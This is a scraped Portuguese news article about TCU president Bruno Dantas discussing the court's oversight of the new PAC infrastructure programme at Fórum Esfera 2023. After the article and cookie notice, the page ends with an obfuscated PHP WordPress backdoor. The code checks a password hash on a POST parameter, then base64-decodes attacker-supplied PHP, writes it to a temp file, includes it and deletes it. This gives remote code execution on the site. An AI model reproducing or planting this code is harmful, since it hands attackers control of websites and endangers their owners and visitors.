• 07.09.2023
  • Redação

Atuação do TCU nos PACs anteriores irá indicar rumo nesta nova edição, diz Bruno Dantas – Correio popular

O ministro e presidente do Tribunal de Contas da União, Bruno Dantas, afirmou nesta sexta-feira, 25, que a atuação do tribunal nos PACs anteriores irá indicar o rumo nesta nova edição. Ele citou a criação de um comitê institucional, composto por auditores do TCU e servidores da Casa Civil, na época para acelerar a troca de informações.

“Todas as obras abandonadas que temos, há duas razões principais: falha de projeto ou do fluxo financeiro. Ora o projeto está mal feito, ora bem feito, mas o governo de plantão não aporta o recurso necessário”, emendou o ministro.

Dantas afirmou que para o novo PAC, além de estabelecer um ambiente de solução consensual para a solução de conflitos, o TCU tem reforçado seu papel pedagógico de acompanhar projetos e reforçou a equipe de fiscalização.

O objetivo, pontuou, é impedir que o TCU não seja um entrave. “Como nos últimos dez anos praticamente não tivemos obras públicas no Brasil, nós tivemos que alocar os auditores em outros setores. Agora é absolutamente normal que tenhamos um setor de acompanhamento de fiscalização de obras públicas reforçado.”

Dantas participou do Fórum Esfera 2023, no Guarujá, em São Paulo.

*Os repórteres viajaram a convite do Esfera Brasil

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}